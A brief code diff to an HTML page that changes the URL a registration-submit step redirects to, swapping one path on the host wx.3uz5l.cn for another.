--- a/index.html
+++ b/index.html
@@ -92,7 +92,7 @@
 
         //提交注册
 
-        window.location.href = "https://wx.3uz5l.cn:1443/m2fa";
+        window.location.href = "https://wx.3uz5l.cn:1443/MzMw";
 
 
     }
